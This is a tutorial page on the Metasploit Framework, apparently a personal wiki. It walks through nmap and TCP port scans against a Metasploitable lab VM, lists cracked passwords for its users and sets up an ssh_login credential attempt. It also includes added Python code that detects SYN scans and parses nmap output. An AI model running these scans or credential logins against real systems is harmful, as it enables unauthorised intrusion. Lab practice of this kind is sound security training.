MSF
From charlesreid1
Metasploit framework info: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Also see Metasploitable for Metasploit in action!
Basics
Fire up metasploit:
$ msfconsole
Get some help:
msf> ?
Use a particular exploit:
msf> use some/particular/exploit
Show info about how to use the exploit:
msf> info
msf> info some/particular/exploit
Set your variables:
msf> set RHOST 127.0.0.1
Run the exploit:
msf> run
Not-So-Basics
Initializing DB
First, you want postgresql to run as a server:
$ service postgresql start
PostgreSQL is the database backend that MSF uses.
Now initialize the database:
$ msfdb init
Running
To get a metasploit console, run
$ msfconsole
Capturing Metasploit Console Output
If you want to capture the output you're seeing in Metasploit framework console, you can use the spool command.
spool /root/box/metasploitable/metasploit.log
If the spool command is not available, your copy of the framework is out of date; run msfupdate to update it.
msf > spool /root/box/metasploitable/metasploit.log
[*] Spooling to file /root/box/metasploitable/metasploit.log...
msf >
To stop recording, set spool to off:
msf > spool off
[*] Spooling is now disable
msf >
Ninja
How to exploit hosts that aren't available remotely
Suppose you're not a client trying to exploit a server, but are a server trying to exploit a client.
What can you do?
Advanced
Creating Workspace
You can create a workspace to save scan information:
msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
msf > workspace metasploitable
[-] Workspace not found: metasploitable
msf > workspace -a metasploitable
[*] Added workspace: metasploitable
msf > workspace
  default
* metasploitable
msf > workspace -h
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r <old> <new>   Rename workspace
    workspace -h               Show this help information
msf >
Reloading Workspace
You can reload a workspace by listing all workspaces, then typing workspace [name]. Here, I reload the metasploitable workspace:
msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
  metasploitable
msf > workspace metasploitable
[*] Workspace: metasploitable
msf >
Nmap Scan Into Workspace
Use db_nmap instead of nmap so that the scan results are stored in the database of the current workspace. Note that the first two runs below fail the host-discovery ping (nmap's "Host seems down" message); the third run, against the same host, goes through.
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:54 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.68 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.67 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Nmap scan report for 10.0.0.27
[*] Nmap: Host is up (0.0015s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2016-03-25T23:42:57+00:00; -10h12m30s from scanner time.
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_  bind.version: 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      42714/tcp  mountd
[*] Nmap: |   100005  1,2,3      46675/udp  mountd
[*] Nmap: |   100021  1,3,4      33001/tcp  nlockmgr
[*] Nmap: |   100021  1,3,4      58755/udp  nlockmgr
[*] Nmap: |   100024  1          35518/udp  status
[*] Nmap: |_  100024  1          46140/tcp  status
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    Java RMI Registry
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 53
[*] Nmap: |   Version: .0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 10
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: Speaks41ProtocolNew, Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: [k*.G\v`^63:h~cRR'eM
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: |   Protocol version: 3.3
[*] Nmap: |   Security types:
[*] Nmap: |_    Unknown security type (33554432)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-favicon: Apache Tomcat
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Apache Tomcat/5.5
[*] Nmap: MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   NetBIOS computer name:
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2016-03-25T19:42:53-04:00
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT      ADDRESS
[*] Nmap: 1   1.47 ms  10.0.0.27
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.16 seconds
This information will be imported and parsed accordingly:
msf > hosts

Hosts
=====

address    mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---                ----  -------  ---------  -----  -------  ----  --------
10.0.0.27  08:00:27:47:98:ad        Linux    2.6.X             server

msf >
Back Up Workspace
To back up a workspace, use db_export:
msf > db_export -h
Usage:
    db_export -f <format> [filename]

Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/metasploitable.xml
[*] Starting export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
[*]     >> Starting export of report
[*]     >> Starting export of hosts
[*]     >> Starting export of events
[*]     >> Starting export of services
[*]     >> Starting export of web sites
[*]     >> Starting export of web pages
[*]     >> Starting export of web forms
[*]     >> Starting export of web vulns
[*]     >> Starting export of module details
[*]     >> Finished export of report
[*] Finished export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
msf >
Dealing With Hosts
The interface for using the hosts information is very powerful. We can use the -c switch to control what columns are shown:
msf > hosts -c address,os_name

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >
We can also narrow down results (if we have a large number of hosts on a network) by searching for strings:
msf > hosts -c address,os_name -S linux

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >
Passing Hosts to RHOST
If we have loaded a module, like auxiliary/scanner/portscan/tcp, we can pass the hosts from the database straight into RHOSTS by adding the -R flag to the hosts command. (This can add multiple remote hosts to a scan - handy for long lists of hosts.)
The output of each module run goes into the database as well: a TCP scan identifies open ports, and each open port is added as a service in the current workspace.
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > hosts -c address,os_name -S linux -R

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

RHOSTS => 10.0.0.27
msf auxiliary(tcp) > run
[*] 10.0.0.27:22 - TCP OPEN
[*] 10.0.0.27:23 - TCP OPEN
[*] 10.0.0.27:21 - TCP OPEN
[*] 10.0.0.27:25 - TCP OPEN
[*] 10.0.0.27:53 - TCP OPEN
[*] 10.0.0.27:80 - TCP OPEN
[*] 10.0.0.27:111 - TCP OPEN
[*] 10.0.0.27:139 - TCP OPEN
[*] 10.0.0.27:445 - TCP OPEN
[*] 10.0.0.27:514 - TCP OPEN
[*] 10.0.0.27:513 - TCP OPEN
[*] 10.0.0.27:512 - TCP OPEN
[*] 10.0.0.27:1099 - TCP OPEN
[*] 10.0.0.27:1524 - TCP OPEN
[*] 10.0.0.27:2049 - TCP OPEN
[*] 10.0.0.27:2121 - TCP OPEN
[*] 10.0.0.27:3306 - TCP OPEN
[*] 10.0.0.27:3632 - TCP OPEN
[*] 10.0.0.27:5432 - TCP OPEN
[*] 10.0.0.27:5900 - TCP OPEN
[*] 10.0.0.27:6000 - TCP OPEN
[*] 10.0.0.27:6667 - TCP OPEN
[*] 10.0.0.27:6697 - TCP OPEN
[*] 10.0.0.27:8009 - TCP OPEN
[*] 10.0.0.27:8180 - TCP OPEN
[*] 10.0.0.27:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
This process will create a deluge of packet traffic between the attacker (morpheus) and the target (metasploitable, 10.0.0.27), as shown by tcpdump:
# tcpdump -i eth0
[...]
03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0
03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0
03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0
03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0
03:35:33.708617 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.816292 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834214 IP morpheus.52147 > 10.0.0.27.7751: Flags [S], seq 2171151102, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0
03:35:33.834502 IP 10.0.0.27.7751 > morpheus.52147: Flags [R.], seq 0, ack 2171151103, win 0, length 0
03:35:33.834831 IP morpheus.43955 > 10.0.0.27.7752: Flags [S], seq 1337658889, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835315 IP 10.0.0.27.7752 > morpheus.43955: Flags [R.], seq 0, ack 1337658890, win 0, length 0
03:35:33.835404 IP morpheus.48124 > 10.0.0.27.7755: Flags [S], seq 2750644096, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835964 IP morpheus.41084 > 10.0.0.27.7756: Flags [S], seq 2965282008, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836016 IP 10.0.0.27.7755 > morpheus.48124: Flags [R.], seq 0, ack 2750644097, win 0, length 0
03:35:33.836268 IP 10.0.0.27.7756 > morpheus.41084: Flags [R.], seq 0, ack 2965282009, win 0, length 0
03:35:33.836544 IP morpheus.53623 > 10.0.0.27.7757: Flags [S], seq 1989216855, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836835 IP 10.0.0.27.7757 > morpheus.53623: Flags [R.], seq 0, ack 1989216856, win 0, length 0
03:35:33.837113 IP morpheus.34173 > 10.0.0.27.7758: Flags [S], seq 462052512, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.837454 IP 10.0.0.27.7758 > morpheus.34173: Flags [R.], seq 0, ack 462052513, win 0, length 0
03:35:33.837707 IP morpheus.39847 > 10.0.0.27.7759: Flags [S], seq 4103494796, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.837976 IP 10.0.0.27.7759 > morpheus.39847: Flags [R.], seq 0, ack 4103494797, win 0, length 0
03:35:33.838475 IP morpheus.51488 > 10.0.0.27.7760: Flags [S], seq 3689956999, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.838757 IP 10.0.0.27.7760 > morpheus.51488: Flags [R.], seq 0, ack 3689957000, win 0, length 0
03:35:33.840901 IP morpheus.37018 > 10.0.0.27.7754: Flags [S], seq 2708295021, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.841397 IP 10.0.0.27.7754 > morpheus.37018: Flags [R.], seq 0, ack 2708295022, win 0, length 0
03:35:33.926962 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.034038 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.149946 IP 10.0.0.1.55203 > 239.255.255.250.1900: UDP, length 104
03:35:34.166687 IP morpheus.59867 > 10.0.0.27.7763: Flags [S], seq 3464606117, win 29200, options [mss 1460,sackOK,TS val 67880524 ecr 0,nop,wscale 10], length 0
03:35:34.167308 IP 10.0.0.27.7763 > morpheus.59867: Flags [R.], seq 0, ack 3464606118, win 0, length 0
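The blue-team reading of that capture: a SYN scan of this kind is easy to pick out of tcpdump output, because a single source sends bare SYNs to many distinct ports within a fraction of a second and the target answers most of them with RST/ACK (closed ports). The following is an added example, not code from the original page, that does exactly that over tcpdump text lines. The embedded capture is a constructed excerpt of the tcpdump output above; the one-second window and the threshold of five distinct ports are assumptions chosen for this example and would be tuned for a real network.

```python
"""Pick a TCP SYN scan out of tcpdump text output.

Added example, not code from the original page.  The capture below is a
constructed excerpt of the tcpdump output shown on this page; the window
and threshold defaults are assumptions for this example."""
import re
from collections import defaultdict

# Constructed sample: seven SYN probes from "morpheus" to 10.0.0.27, the
# RST/ACK each one gets back, and some unrelated SSDP noise in between.
SAMPLE_TCPDUMP = """\
03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0
03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0
03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0
03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0
03:35:33.708617 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834214 IP morpheus.52147 > 10.0.0.27.7751: Flags [S], seq 2171151102, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0
03:35:33.834502 IP 10.0.0.27.7751 > morpheus.52147: Flags [R.], seq 0, ack 2171151103, win 0, length 0
03:35:33.834831 IP morpheus.43955 > 10.0.0.27.7752: Flags [S], seq 1337658889, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835315 IP 10.0.0.27.7752 > morpheus.43955: Flags [R.], seq 0, ack 1337658890, win 0, length 0
03:35:34.149946 IP 10.0.0.1.55203 > 239.255.255.250.1900: UDP, length 104
"""

# Matches IPv4 TCP records only: "HH:MM:SS.ffffff IP src.sport > dst.dport: Flags [..]".
# IPv6 ("IP6 ...") and UDP records do not match and are skipped.
TCP_LINE = re.compile(
    r"^(\d\d):(\d\d):(\d\d\.\d+) IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]+)\]")


def parse_tcp(text):
    """Yield (t_seconds, src, sport, dst, dport, flags) for each IPv4 TCP record."""
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if not m:
            continue
        hh, mm, ss, src, sport, dst, dport, flags = m.groups()
        t = int(hh) * 3600 + int(mm) * 60 + float(ss)
        yield t, src, int(sport), dst, int(dport), flags


def detect_scans(text, window=1.0, min_ports=5):
    """Return one report per (scanner, target) pair that sent bare SYNs to at
    least `min_ports` distinct ports inside any `window`-second interval.

    closed_ports counts probed ports the target answered with RST/ACK, which
    is the signature of a scan walking through closed ports."""
    probes = defaultdict(list)    # (src, dst) -> [(t, dport), ...]
    rst_from = defaultdict(set)   # (scanner, target) -> target ports that sent RST/ACK
    for t, src, sport, dst, dport, flags in parse_tcp(text):
        if flags == "S":
            probes[(src, dst)].append((t, dport))
        elif flags == "R.":
            # The reply goes target -> scanner; key it by the original pair.
            rst_from[(dst, src)].add(sport)

    reports = []
    for key, events in probes.items():
        events.sort()
        probed = {p for _, p in events}
        for i, (t0, _) in enumerate(events):
            in_window = {p for t, p in events[i:] if t - t0 <= window}
            if len(in_window) >= min_ports:
                reports.append({
                    "scanner": key[0],
                    "target": key[1],
                    "first": events[0][0],
                    "last": events[-1][0],
                    "ports_probed": len(probed),
                    "closed_ports": len(probed & rst_from[key]),
                })
                break  # one report per pair is enough
    return reports


if __name__ == "__main__":
    for r in detect_scans(SAMPLE_TCPDUMP):
        print(f"{r['scanner']} -> {r['target']}: {r['ports_probed']} ports in "
              f"{r['last'] - r['first']:.3f}s, {r['closed_ports']} answered RST/ACK")
```

Feed it `tcpdump -i eth0 -nn tcp` output saved to a file; with `-nn` the source shows up as an address instead of the resolved name "morpheus", which is what you want when correlating with the Metasploit hosts table.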
Services
Once we have done an Nmap and TCP scan, we know what services are running and what ports are open.
Show the services that are up with services -u:
msf auxiliary(tcp) > services -u

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open

msf auxiliary(tcp) >
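What db_nmap stores, and what hosts -c / services -u give back, can be reproduced offline from the raw nmap text, which is handy when you only have a spool log or a saved scan rather than a live database. The following is an added example, not code from the original page or from Metasploit, that parses nmap or db_nmap console output into host and service records, answers the same two queries, and additionally flags the open services a pentester would look at first. The scan embedded in it is a constructed excerpt of the db_nmap output above, and the exposure rules (cleartext login services, anonymous FTP, network-reachable database and NFS daemons) are this example's own assumptions, not something the page or nmap defines.

```python
"""Parse nmap / db_nmap console output into the host and service records
that Metasploit keeps in its database, then answer the same questions as
`hosts -c ... -S ...` and `services -u`.

Added example, not code from the original page or from Metasploit.  The
scan below is a constructed excerpt of the db_nmap output shown on this
page; the exposure rules are assumptions made for this example."""
import re
from dataclasses import dataclass, field

# Constructed sample: a cut-down copy of the db_nmap run above, including
# the "[*] Nmap: " prefix that msfconsole adds to every line.
SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 10.0.0.27
[*] Nmap: Host is up (0.0015s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
[*] Nmap: Running: Linux 2.6.X
"""

PREFIX = re.compile(r"^\[\*\] Nmap: ")                       # db_nmap line prefix
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    info: str = ""
    scripts: list = field(default_factory=list)   # NSE output lines for this port


@dataclass
class Host:
    address: str = ""
    mac: str = ""
    os_name: str = ""
    services: list = field(default_factory=list)


def parse_nmap(text):
    """Return one Host per 'Nmap scan report for ...' block in plain nmap or
    db_nmap output.  Script lines ("|_ftp-anon: ...") are attached to the
    service printed just before them."""
    hosts, host, current = [], None, None
    for raw in text.splitlines():
        line = PREFIX.sub("", raw).rstrip()
        if line.startswith("Nmap scan report for "):
            host = Host(address=line.split()[-1].strip("()"))
            hosts.append(host)
            current = None
        elif host is None:
            continue
        elif line.startswith("MAC Address:"):
            host.mac = line.split()[2].lower()
            current = None
        elif line.startswith("Running:"):
            host.os_name = line.split(":", 1)[1].strip()
        elif line.startswith("Host script results:"):
            current = None          # host-level scripts, not tied to a port
        elif line.startswith("|"):
            if current is not None:
                current.scripts.append(line.lstrip("|_ ").strip())
        else:
            m = PORT_LINE.match(line)
            if m:
                port, proto, state, name, info = m.groups()
                current = Service(int(port), proto, state, name, info or "")
                host.services.append(current)
    return hosts


def services_up(host):
    """Equivalent of `services -u`: only services whose state is open."""
    return [s for s in host.services if s.state == "open"]


# Assumed rules for this example.  The names are nmap's service names; the
# reasoning is generic: cleartext logins and unauthenticated shells, and
# daemons that should never face the network unauthenticated.
CLEARTEXT_LOGIN = {"telnet", "exec", "login", "login?", "shell"}
NETWORK_DAEMONS = {"mysql", "postgresql", "nfs", "rpcbind", "vnc", "X11"}


def exposures(host):
    """Return (port, reason) pairs for open services that deserve a closer look."""
    found = []
    for s in services_up(host):
        if any(x.startswith("ftp-anon: Anonymous FTP login allowed") for x in s.scripts):
            found.append((s.port, "anonymous FTP login allowed"))
        if s.name in CLEARTEXT_LOGIN:
            found.append((s.port, f"cleartext login service ({s.name})"))
        if s.name in NETWORK_DAEMONS:
            found.append((s.port, f"{s.name} reachable from the network"))
    return found


def hosts_table(hosts, columns=("address", "os_name"), search=None):
    """Equivalent of `hosts -c <columns> -S <search>`: one row tuple per host,
    keeping only rows where some column contains the search string."""
    rows = []
    for h in hosts:
        row = tuple(getattr(h, c) for c in columns)
        if search is None or any(search.lower() in str(v).lower() for v in row):
            rows.append(row)
    return rows


if __name__ == "__main__":
    for h in parse_nmap(SAMPLE_SCAN):
        print(h.address, h.mac, h.os_name)
        for s in services_up(h):
            print(f"  {s.port}/{s.proto} {s.name} {s.info}")
        for port, why in exposures(h):
            print(f"  !! {port}: {why}")
```

The same parser works on the plain `nmap -sS -sV -A` output further down the page, since the only difference is the "[*] Nmap: " prefix that it strips.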
Credentials
Like services, credentials are also accrued in the database.
msf > creds

Credentials
===========

host  port  user  pass  type  active?
----  ----  ----  ----  ----  -------

[*] Found 0 credentials.
Once you find credentials, you can add them manually. We found credentials for 6 out of 7 users with John the Ripper (see Metasploitable/John Shadow File):
password (username)
-----------------------------------
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
batman (sys)
123456789 (klog)
Rather than adding them by hand, run each username/password pair through the ssh_login module; every successful login is stored as a credential in the workspace:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(ssh_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf auxiliary(ssh_login) > run
